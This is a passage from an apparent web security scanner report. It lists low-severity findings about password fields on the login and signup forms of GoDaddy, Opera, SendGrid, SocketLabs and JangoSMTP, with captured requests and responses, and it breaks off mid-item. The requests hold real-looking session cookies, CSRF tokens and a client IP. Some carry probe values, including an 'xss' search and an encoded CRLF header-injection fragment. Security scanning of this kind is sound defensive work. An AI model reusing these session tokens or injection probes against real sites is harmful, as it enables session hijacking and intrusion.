HTTP/1.1 200 OKbkgocvhqhmjwbmindlamiea; domain=godaddy.com; expires=Thu, 16-Sep-2021 18:08:24 GMT; path=/rceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:08:24 GMT; path=/&referrer=&sitename=mya.godaddy.com&page=/Default.aspx&server=M1PWMYAWEB003&status=200 OK&querystring=idpinfo=none&myaurl=%2fdefault.aspx&ci=13025&shopper=46215684&privatelabelid=1&isc=d0d8de1c80&clientip=50.23.123.106&referringpath=b60669da-2123-4bfc-afe4-9bcdeba931e5&referringdomain=&split=95; domain=godaddy.com; path=//xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... <form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDMYA-M1PWMYAWEB003" onsubmit="return pcj_login_action(this);"> ...[SNIP]... <input tabindex="10" onfocus="document.getElementById('pass_focus').value='true';pcj_blurpass('over');" onblur="document.getElementById('pass_focus').value='false';pcj_blurpass('off');" type="password" name="password" id="password" value="" class="pwd inp_iphone" /> ...[SNIP]...
12.14. https://mya.godaddy.com/myrenewals/myRenewals.aspx
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
https://mya.godaddy.com
Path:
/myrenewals/myRenewals.aspx
Issue detail
The page contains a form with the following action URL:https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDMYA-M1PWMYAWEB003
Request
GET /myrenewals/myRenewals.aspx?ci=11279&tab=products HTTP/1.1/login.aspx?ci=10530&spkey=GDSWNET-M1PWCORPWEB181&redirect=false&target=http%3a%2f%2fwww.godaddy.com%2foffers%2fhot-deals2.aspx/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3laypopin=false; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; flag1=cflag=us; preferences1=_sid=uddglhvacbaaxcsewbpfbfkhsgjjfjxe&gdshop_currencyType=USD&dataCenterCode=US; SplitValue1=95; pathway=b60669da-2123-4bfc-afe4-9bcdeba931e5; ASP.NET_SessionId=sxaobr55fgak5g55bzrndx2d; ShopperId1=sbravgnfjbbhqgwfvetdgajdqbqdniza; BlueLithium_domainsearch=obsjsdjcfihcwgzeliqdtiigagkahckc; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pagecount=3; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; currency1=potableSourceStr=USD; adc1=US; traffic=
Response
HTTP/1.1 200 OKrceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:09:07 GMT; path=/&referrer=https://idp.godaddy.com/login.aspx?ci=10530&spkey=GDSWNET-M1PWCORPWEB181&redirect=false&target=http%3a%2f%2fwww.godaddy.com%2foffers%2fhot-deals2.aspx&sitename=mya.godaddy.com&page=/myrenewals/myRenewals.aspx&server=M1PWMYAWEB003&status=200 OK&querystring=ci=11279&tab=products&shopper=46215684&privatelabelid=1&isc=d0d8de1c80&clientip=50.23.123.106&referringpath=4d9fa55d-454a-463a-ad89-702facb7913c&referringdomain=&split=45; domain=godaddy.com; path=//xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... <form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDMYA-M1PWMYAWEB003" onsubmit="return pcj_login_action(this);"> ...[SNIP]... <input tabindex="10" onfocus="document.getElementById('pass_focus').value='true';pcj_blurpass('over');" onblur="document.getElementById('pass_focus').value='false';pcj_blurpass('off');" type="password" name="password" id="password" value="" class="pwd inp_iphone" /> ...[SNIP]...
12.15. https://portal.opera.com/accounts/login/
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
https://portal.opera.com
Path:
/accounts/login/
Issue detail
The page contains a form with the following action URL:https://portal.opera.com/accounts/login/
Request
GET /accounts/login/ HTTP/1.1/portal/tabs/?tab_name=Opera%20Portal/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3.1534674535.1316207960.1316207960.1316207960.1; __utmb=122269525.3.10.1316207960; __utmc=122269525; __utmz=122269525.1316207960.1.1.utmcsr=unite.opera.com|utmccn=(referral)|utmcmd=referral|utmcct=/application/192/; opal_sessionid=46086d7992e13cfe7e9bdef9bd665ed5; csrftoken=838dab485752a3df29256e939fd2d3cb; __utma=258618251.1095286181.1316208009.1316208009.1316208009.1; __utmb=258618251.2.10.1316208016; __utmc=258618251; __utmz=258618251.1316208016.1.1.utmcsr=opera.com|utmccn=(referral)|utmcmd=referral|utmcct=/company/
Response
HTTP/1.1 200 OK,Accept-Encoding/static/misc/yadis.xrdf52a3df29256e939fd2d3cb; expires=Fri, 14-Sep-2012 16:25:28 GMT; Max-Age=31449600; Path=/d7992e13cfe7e9bdef9bd665ed5; expires=Fri, 30-Sep-2011 16:25:28 GMT; Max-Age=1209600; Path=/...[SNIP]... <form action="/accounts/login/" ...[SNIP]... <input type="password" name="password" id="id_password" /> ...[SNIP]...
12.16. https://sendgrid.com/user/signup/package/44
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
https://sendgrid.com
Path:
/user/signup/package/44
Issue detail
The page contains a form with the following action URL:https://sendgrid.com/user/signup/package/44
Request
GET /user/signup/package/44 HTTP/1.1/pricing.html?gclid=CPWo1PSJoqsCFRRSgwod8HVslQ/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3.dUUOzxbhAvTn.1316222838.1316222838.1316222838.1; __ptv_0a6gTR=dUUOzxbhAvTn; __pti_0a6gTR=dUUOzxbhAvTn; __ptcc=1; __ptcs=111872475.1.10.1316222838; __ptcz=111872475.1316222838.1.0.ptmcsr=google|ptmcmd=organic|ptmccn=(organic)|ptmctr=smtp+server|ptmcex=9GFPhk.3Gp89g.1|ptmcx2=9GFPhk.3Gp89g.1; symfony=2620e59692610735faaba9cd7ccd2c6f:85ae52515893387e57b673877b205ea2bae4ed49; __qca=P0-572909897-1316204950437; _mkto_trk=id:467-KXI-123&token:_mch-sendgrid.com-1316204836485-43033; __utma=111872475.871024225.1316204951.1316204951.1316204951.1; __utmb=111872475.1.10.1316204951; __utmc=111872475; __utmz=111872475.1316204951.1.1.utmgclid=CPWo1PSJoqsCFRRSgwod8HVslQ|utmccn=(not%20set)|utmcmd=(not%20set); SnapABugRef=http%3A%2F%2Fsendgrid.com%2Fpricing.html%3Fgclid%3DCPWo1PSJoqsCFRRSgwod8HVslQ%20http%3A%2F%2Flanding.sendgrid.com%2Fsmtp-with-bullet-points%2F%3Fgclid%3DCPWo1PSJoqsCFRRSgwod8HVslQ; SnapABugHistory=1#; SnapABugVisit=8d68486b-56f8-4224-9862-8ffa3106ecfb-578112706076353; km_ai=n1EPXU78Lr4accy0ZIHA%2Fx7iGbI%3D; km_lv=1316204954; km_uq=; _chartbeat2=al0oan3xoujtpzgt.1316204955548
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml" xml:lang="en" lang="en">...[SNIP]... <form id="signup_form" name="signup_form" action="/user/signup/package/44" method="post"> ...[SNIP]... <input class="inputbox form_element" maxlength="20" type="password" name="signup[password]" id="signup_password" /> </div>...[SNIP]...
12.17. http://shoprunner.force.com/content/JsContentElementsDRGS
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://shoprunner.force.com
Path:
/content/JsContentElementsDRGS
Issue detail
The page contains a form with the following action URL:http://shoprunner.force.com/content/step1
Request
GET /content/JsContentElementsDRGS HTTP/1.1;q=0.7
Response
HTTP/1.1 200 OK-------------------------------- */...[SNIP]... <form action="step1" id="sr_lrn1F" name="sr_step1" onsubmit="if(sr_$.actions.validate.form(\'sr_lrn1F\')){sr_$.actions.learnStep(2);}return false;"> <h4 class="sr_htag">...[SNIP]... <input class="sr_vpassword" name="password2" tabindex="1" type="password"> </li>...[SNIP]...
12.18. https://support.socketlabs.com/
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
https://support.socketlabs.com
Path:
/
Issue detail
The page contains a form with the following action URL:https://support.socketlabs.com/index.php/Base/User/Login
Request
GET / HTTP/1.1/faq//xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3PFIBO4BHUYTYMWQTGG1A999; wooMeta=ODUwNjQmMSYyJjI4OTYxOSYxMzE2MTg2Nzk5NDEwJjEzMTYxODcwODkwMjgmaHR0cCUzQSUyRiUyRnd3dy5nb29nbGUuY29tJTJGc2VhcmNoJTNGc291cmNlaWQlM0RjaHJvbWUlMjZpZSUzRFVURi04JTI2cSUzRHNtdHAlMkJzZXJ2ZXImMTAxJnNtdHArc2VydmVyJjUwMDI1OSYmJiY=
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... <form method="post" action="https://support.socketlabs.com/index.php/Base/User/Login" name="LoginForm"> /HomeIndex/Index" />...[SNIP]... <input class="loginstyled" value="" name="scpassword" type="password"> ...[SNIP]...
12.19. https://support.socketlabs.com/index.php/Base/User/Login
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
https://support.socketlabs.com
Path:
/index.php/Base/User/Login
Issue detail
The page contains a form with the following action URL:https://support.socketlabs.com/index.php/Base/User/Login
Request
POST /index.php/Base/User/Login HTTP/1.1.socketlabs.com/.socketlabs.com-urlencoded/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3PFIBO4BHUYTYMWQTGG1A999; wooMeta=ODUwNjQmMSYyJjI4OTYxOSYxMzE2MTg2Nzk5NDEwJjEzMTYxODcwODkwMjgmaHR0cCUzQSUyRiUyRnd3dy5nb29nbGUuY29tJTJGc2VhcmNoJTNGc291cmNlaWQlM0RjaHJvbWUlMjZpZSUzRFVURi04JTI2cSUzRHNtdHAlMkJzZXJ2ZXImMTAxJnNtdHArc2VydmVyJjUwMDI1OSYmJiY=; SWIFT_client=a%3A1%3A%7Bs%3A15%3A%22templategroupid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_sessionid40=es1qz018py0u704q2o1k7083rf1lm0bf%2FKnowledgebase%2FHomeIndex%2FIndex&scemail=Your+email+address&scpassword=
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... <form method="post" action="https://support.socketlabs.com/index.php/Base/User/Login" name="LoginForm"> ...[SNIP]... <input class="loginstyled" value="" name="scpassword" type="password"> ...[SNIP]...
12.20. https://support.socketlabs.com/index.php/Base/UserRegistration/Register
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
https://support.socketlabs.com
Path:
/index.php/Base/UserRegistration/Register
Issue detail
The page contains a form with the following action URL:https://support.socketlabs.com/index.php/Base/UserRegistration/RegisterSubmit regpassword passwordrepeat
Request
GET /index.php/Base/UserRegistration/Register HTTP/1.1.socketlabs.com/index.php/Base/User/Login/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3PFIBO4BHUYTYMWQTGG1A999; wooMeta=ODUwNjQmMSYyJjI4OTYxOSYxMzE2MTg2Nzk5NDEwJjEzMTYxODcwODkwMjgmaHR0cCUzQSUyRiUyRnd3dy5nb29nbGUuY29tJTJGc2VhcmNoJTNGc291cmNlaWQlM0RjaHJvbWUlMjZpZSUzRFVURi04JTI2cSUzRHNtdHAlMkJzZXJ2ZXImMTAxJnNtdHArc2VydmVyJjUwMDI1OSYmJiY=; SWIFT_client=a%3A1%3A%7Bs%3A15%3A%22templategroupid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_sessionid40=es1qz018py0u704q2o1k7083rf1lm0bf
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... <form method="post" action="https://support.socketlabs.com/index.php/Base/UserRegistration/RegisterSubmit" enctype="multipart/form-data" name="RegisterForm"> ...[SNIP]... <input name="regpassword" type="password" size="20" class="swifttextlarge" /> </td>...[SNIP]... <input name="passwordrepeat" type="password" size="20" class="swifttextlarge" /> </td>...[SNIP]...
12.21. https://support.socketlabs.com/index.php/Base/UserRegistration/Register
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
https://support.socketlabs.com
Path:
/index.php/Base/UserRegistration/Register
Issue detail
The page contains a form with the following action URL:https://support.socketlabs.com/index.php/Base/User/Login
Request
GET /index.php/Base/UserRegistration/Register HTTP/1.1.socketlabs.com/index.php/Base/User/Login/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3PFIBO4BHUYTYMWQTGG1A999; wooMeta=ODUwNjQmMSYyJjI4OTYxOSYxMzE2MTg2Nzk5NDEwJjEzMTYxODcwODkwMjgmaHR0cCUzQSUyRiUyRnd3dy5nb29nbGUuY29tJTJGc2VhcmNoJTNGc291cmNlaWQlM0RjaHJvbWUlMjZpZSUzRFVURi04JTI2cSUzRHNtdHAlMkJzZXJ2ZXImMTAxJnNtdHArc2VydmVyJjUwMDI1OSYmJiY=; SWIFT_client=a%3A1%3A%7Bs%3A15%3A%22templategroupid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_sessionid40=es1qz018py0u704q2o1k7083rf1lm0bf
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... <form method="post" action="https://support.socketlabs.com/index.php/Base/User/Login" name="LoginForm"> istration/Register" />...[SNIP]... <input class="loginstyled" value="" name="scpassword" type="password"> ...[SNIP]...
12.22. https://support.socketlabs.com/index.php/Base/UserRegistration/RegisterSubmit
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
https://support.socketlabs.com
Path:
/index.php/Base/UserRegistration/RegisterSubmit
Issue detail
The page contains a form with the following action URL:https://support.socketlabs.com/index.php/Base/User/Login
Request
POST /index.php/Base/UserRegistration/RegisterSubmit HTTP/1.1.socketlabs.com/index.php/Base/UserRegistration/Register.socketlabs.comormBoundaryKmcBgFc5dd4a1T1r/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3PFIBO4BHUYTYMWQTGG1A999; wooMeta=ODUwNjQmMSYyJjI4OTYxOSYxMzE2MTg2Nzk5NDEwJjEzMTYxODcwODkwMjgmaHR0cCUzQSUyRiUyRnd3dy5nb29nbGUuY29tJTJGc2VhcmNoJTNGc291cmNlaWQlM0RjaHJvbWUlMjZpZSUzRFVURi04JTI2cSUzRHNtdHAlMkJzZXJ2ZXImMTAxJnNtdHArc2VydmVyJjUwMDI1OSYmJiY=; SWIFT_client=a%3A1%3A%7Bs%3A15%3A%22templategroupid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_sessionid40=es1qz018py0u704q2o1k7083rf1lm0bfdaryKmcBgFc5dd4a1T1rdaryKmcBgFc5dd4a1T1r...[SNIP]...
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... <form method="post" action="https://support.socketlabs.com/index.php/Base/User/Login" name="LoginForm"> istration/RegisterSubmit" />...[SNIP]... <input class="loginstyled" value="" name="scpassword" type="password"> ...[SNIP]...
12.23. https://support.socketlabs.com/index.php/Base/UserRegistration/RegisterSubmit
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
https://support.socketlabs.com
Path:
/index.php/Base/UserRegistration/RegisterSubmit
Issue detail
The page contains a form with the following action URL:https://support.socketlabs.com/index.php/Base/UserRegistration/RegisterSubmit regpassword passwordrepeat
Request
POST /index.php/Base/UserRegistration/RegisterSubmit HTTP/1.1.socketlabs.com/index.php/Base/UserRegistration/Register.socketlabs.comormBoundaryKmcBgFc5dd4a1T1r/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3PFIBO4BHUYTYMWQTGG1A999; wooMeta=ODUwNjQmMSYyJjI4OTYxOSYxMzE2MTg2Nzk5NDEwJjEzMTYxODcwODkwMjgmaHR0cCUzQSUyRiUyRnd3dy5nb29nbGUuY29tJTJGc2VhcmNoJTNGc291cmNlaWQlM0RjaHJvbWUlMjZpZSUzRFVURi04JTI2cSUzRHNtdHAlMkJzZXJ2ZXImMTAxJnNtdHArc2VydmVyJjUwMDI1OSYmJiY=; SWIFT_client=a%3A1%3A%7Bs%3A15%3A%22templategroupid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_sessionid40=es1qz018py0u704q2o1k7083rf1lm0bfdaryKmcBgFc5dd4a1T1rdaryKmcBgFc5dd4a1T1r...[SNIP]...
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... <form method="post" action="https://support.socketlabs.com/index.php/Base/UserRegistration/RegisterSubmit" enctype="multipart/form-data" name="RegisterForm"> ...[SNIP]... <input name="regpassword" type="password" size="20" class="swifttextlarge" /> </td>...[SNIP]... <input name="passwordrepeat" type="password" size="20" class="swifttextlarge" /> </td>...[SNIP]...
12.24. http://www.godaddy.com/
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://www.godaddy.com
Path:
/
Issue detail
The page contains a form with the following action URL:https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB181
Request
GET / HTTP/1.1/web-hosting-news/091611_Go_Daddy_Helping_Customers_Repair_Compromised_Sites/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3laypopin=false; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; ShopperId1=ndqiadmiugedwezalcdaffdhwjpgihjc; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; currency1=potableSourceStr=USD; flag1=cflag=us
Response
HTTP/1.1 200 OKrceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:05:33 GMT; path=/mageTwo; path=/&referrer=http://www.thewhir.com/web-hosting-news/091611_Go_Daddy_Helping_Customers_Repair_Compromised_Sites&sitename=www.godaddy.com&page=/default.aspx&server=M1PWCORPWEB181&status=200 OK&querystring=&shopper=46215684&privatelabelid=1&isc=&clientip=50.23.123.106&referringpath=&referringdomain=&split=95; domain=godaddy.com; path=//xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... <form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB181" onsubmit="return pcj_login_action(this);"> ...[SNIP]... <input tabindex="10" onfocus="document.getElementById('pass_focus').value='true';pcj_blurpass('over');" onblur="document.getElementById('pass_focus').value='false';pcj_blurpass('off');" type="password" name="password" id="password" value="" class="pwd inp_iphone" /> ...[SNIP]...
12.25. http://www.godaddy.com/domains/search.aspx
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://www.godaddy.com
Path:
/domains/search.aspx
Issue detail
The page contains a form with the following action URL:https://idp.godaddy.com/login.aspx?isc=71bf3%250d%250&ci=9106&spkey=GDSWNET-M1PWCORPWEB181
Request
GET /domains/search.aspx HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3laypopin=false; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; flag1=cflag=us; ASP.NET_SessionId=kwd42kibl1s4hu55omguef55; preferences1=_sid=uddglhvacbaaxcsewbpfbfkhsgjjfjxe&gdshop_currencyType=USD&dataCenterCode=US; SplitValue1=95; pathway=b60669da-2123-4bfc-afe4-9bcdeba931e5; HPBackground=DanicaImageTwo; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pagecount=2; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; ShopperId1=sbravgnfjbbhqgwfvetdgajdqbqdniza; currency1=potableSourceStr=USD; adc1=US; traffic=cookies=1&referrer=&sitename=mya.godaddy.com&page=/Default.aspx&server=M1PWMYAWEB003&status=200 OK&querystring=idpinfo=none&myaurl=%2fdefault.aspx&ci=13025&shopper=46215684&privatelabelid=1&isc=&clientip=50.23.123.106&referringpath=b60669da-2123-4bfc-afe4-9bcdeba931e5&referringdomain=&split=95
Response
HTTP/1.1 200 OKrceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:08:28 GMT; path=/&referrer=&sitename=www.godaddy.com&page=/domains/search.aspx&server=M1PWCORPWEB181&status=200 OK&querystring=&shopper=46215684&privatelabelid=1&isc=71bf3%0d%0&clientip=50.23.123.106&referringpath=fb691c64-72f6-4f9a-b525-0b2548cfab03&referringdomain=&split=95; domain=godaddy.com; path=/=jauafgggzbdbdhedqdvejhcgpjbacdnd; domain=godaddy.com; path=//xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... <form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?isc=71bf3%250d%250&ci=9106&spkey=GDSWNET-M1PWCORPWEB181" onsubmit="return pcj_login_action(this);"> ...[SNIP]... <input tabindex="10" onfocus="document.getElementById('pass_focus').value='true';pcj_blurpass('over');" onblur="document.getElementById('pass_focus').value='false';pcj_blurpass('off');" type="password" name="password" id="password" value="" class="pwd inp_iphone" /> ...[SNIP]...
12.26. http://www.godaddy.com/gdshop/site_search.asp
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://www.godaddy.com
Path:
/gdshop/site_search.asp
Issue detail
The page contains a form with the following action URL:https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWB181
Request
POST /gdshop/site_search.asp?ci=9104&pageNum=1&searchFor=xss HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.7=vb1jphe2sxzvygvmo3bblx55; preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; adc1=US; SplitValue1=19; HPBackground=DanicaImageOne; currency1=potableSourceStr=USD; flag1=cflag=us; currencypopin1=cdisplaypopin=false; traffic=; pathway=2a590ae0-0ee8-47bd-8061-af016da64611; pagecount=1; actioncount=; app_pathway=; visitor=vid=2a590ae0-0ee8-47bd-8061-af016da64611; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1-urlencoded
Response
HTTP/1.1 200 OKORPWEB181&sitename=www%2Egodaddy%2Ecom&cookies=1&clientip=50%2E23%2E123%2E106&status=200+OK&referrer=http%3A%2F%2Fwww%2Egodaddy%2Ecom%2F&isc=&privatelabelid=1&page=%2Fgdshop%2Fsite%5Fsearch%2Easp&referringdomain=&referringpath=2a590ae0%2D0ee8%2D47bd%2D8061%2Daf016da64611&shopper=46215684&querystring=ci%3D9104%26pageNum%3D1%26searchFor%3Dxss; domain=.godaddy.com; path=//xhtml1/DTD/xhtml1-transitional.dtd"><html>...[SNIP]... <form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWB181" onsubmit="return pcj_login_action(this);"> ...[SNIP]... <input tabindex="10" onfocus="document.getElementById('pass_focus').value='true';pcj_blurpass('over');" onblur="document.getElementById('pass_focus').value='false';pcj_blurpass('off');" type="password" name="password" id="password" value="" class="pwd inp_iphone" /> ...[SNIP]...
12.27. http://www.godaddy.com/offers/hot-deals2.aspx
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://www.godaddy.com
Path:
/offers/hot-deals2.aspx
Issue detail
The page contains a form with the following action URL:https://idp.godaddy.com/login.aspx?isc=d0d8de1c80&ci=9106&spkey=GDSWNET-M1PWCORPWEB181
Request
GET /offers/hot-deals2.aspx?ci=51455 HTTP/1.1/domains/search.aspx/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3laypopin=false; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; flag1=cflag=us; ASP.NET_SessionId=kwd42kibl1s4hu55omguef55; preferences1=_sid=uddglhvacbaaxcsewbpfbfkhsgjjfjxe&gdshop_currencyType=USD&dataCenterCode=US; SplitValue1=95; pathway=b60669da-2123-4bfc-afe4-9bcdeba931e5; HPBackground=DanicaImageTwo; ShopperId1=sbravgnfjbbhqgwfvetdgajdqbqdniza; BlueLithium_domainsearch=obsjsdjcfihcwgzeliqdtiigagkahckc; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pagecount=2; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; traffic=cookies=1&referrer=http://www.godaddy.com/domains/search.aspx&sitename=www.godaddy.com&page=/Domains/Controls/JsonContent/generalPricing.aspx&server=M1PWCORPWEB181&status=200 OK&querystring=TargetDivID=general_pricing_json_content&_=1316214561887&shopper=46215684&privatelabelid=1&isc=&clientip=50.23.123.106&referringpath=b60669da-2123-4bfc-afe4-9bcdeba931e5&referringdomain=&split=95; currency1=potableSourceStr=USD; adc1=US
Response
HTTP/1.1 200 OKrceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:08:35 GMT; path=/&referrer=http://www.godaddy.com/domains/search.aspx&sitename=www.godaddy.com&page=/offers/hot-deals2.aspx&server=M1PWCORPWEB181&status=200 OK&querystring=ci=51455&shopper=46215684&privatelabelid=1&isc=d0d8de1c80&clientip=50.23.123.106&referringpath=b60669da-2123-4bfc-afe4-9bcdeba931e5&referringdomain=&split=95; domain=godaddy.com; path=//xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... <form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?isc=d0d8de1c80&ci=9106&spkey=GDSWNET-M1PWCORPWEB181" onsubmit="return pcj_login_action(this);"> ...[SNIP]... <input tabindex="10" onfocus="document.getElementById('pass_focus').value='true';pcj_blurpass('over');" onblur="document.getElementById('pass_focus').value='false';pcj_blurpass('off');" type="password" name="password" id="password" value="" class="pwd inp_iphone" /> ...[SNIP]...
12.28. http://www.godaddy.com/productadvisor/pastart.aspx
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://www.godaddy.com
Path:
/productadvisor/pastart.aspx
Issue detail
The page contains a form with the following action URL:https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB181
Request
GET /productadvisor/pastart.aspx?ci=13108 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.7/gdshop/site_search.asp?ci=9104&pageNum=1&searchFor=xss=vb1jphe2sxzvygvmo3bblx55; preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; adc1=US; SplitValue1=19; HPBackground=DanicaImageOne; currency1=potableSourceStr=USD; flag1=cflag=us; currencypopin1=cdisplaypopin=false; traffic=; pathway=2a590ae0-0ee8-47bd-8061-af016da64611; pagecount=2; actioncount=; app_pathway=; visitor=vid=2a590ae0-0ee8-47bd-8061-af016da64611; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMinorVer=0&fMajorVer=0&slMajorVer=-1&slMinorVer=-1; domainYardVal=%2D1; serverVersion=A; ASPSESSIONIDQCRSARQR=BGAMBCHBECAECHGCHMMADCKA
Response
HTTP/1.1 200 OKrceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:07:38 GMT; path=/&referrer=http://www.godaddy.com/gdshop/site_search.asp?ci=9104&pageNum=1&searchFor=xss&sitename=www.godaddy.com&page=/productadvisor/pastart.aspx&server=M1PWCORPWEB181&status=200 OK&querystring=ci=13108&shopper=46215684&privatelabelid=1&isc=&clientip=50.23.123.106&referringpath=2a590ae0-0ee8-47bd-8061-af016da64611&referringdomain=&split=19; domain=godaddy.com; path=//xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... <form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB181" onsubmit="return pcj_login_action(this);"> ...[SNIP]... <input tabindex="10" onfocus="document.getElementById('pass_focus').value='true';pcj_blurpass('over');" onblur="document.getElementById('pass_focus').value='false';pcj_blurpass('off');" type="password" name="password" id="password" value="" class="pwd inp_iphone" /> ...[SNIP]...
12.29. http://www.jangosmtp.com/login.asp
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://www.jangosmtp.com
Path:
/login.asp
Issue detail
The page contains a form with the following action URL:https://www.jangosmtp.com/APPLICATION/processlogin.asp
Request
GET /login.asp HTTP/1.1/Free-Account-Action.asp/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3+server&Referrer=http%3A%2F%2Fwww%2Egoogle%2Ecom%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF%2D8%26q%3Dsmtp%2Bserver&Search=g; ASPSESSIONIDSCTSBTQQ=PLBPJOABDACEOGJJFNFHKHNJ; __utma=213119631.1093174196.1316204842.1316204842.1316204842.1; __utmb=213119631.4.10.1316204842; __utmc=213119631; __utmz=213119631.1316204842.1.1.utmgclid=CKGSi_aJoqsCFRdTgwod5zgZiw|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=smtp%20server; _chartbeat2=vs5g6yeo9lxk52er.1316204846394
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... <form action="https://www.jangosmtp.com/APPLICATION/processlogin.asp" method="post" name="loginform" id="loginform"> ...[SNIP]... <input type="password" name="password" size="30" maxlength="15"> <a href="PasswordReset.asp" style="font-size:10pt;">...[SNIP]...
12.30. https://www.jangosmtp.com/login.asp
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
https://www.jangosmtp.com
Path:
/login.asp
Issue detail
The page contains a form with the following action URL:https://www.jangosmtp.com/APPLICATION/processlogin.asp
Request
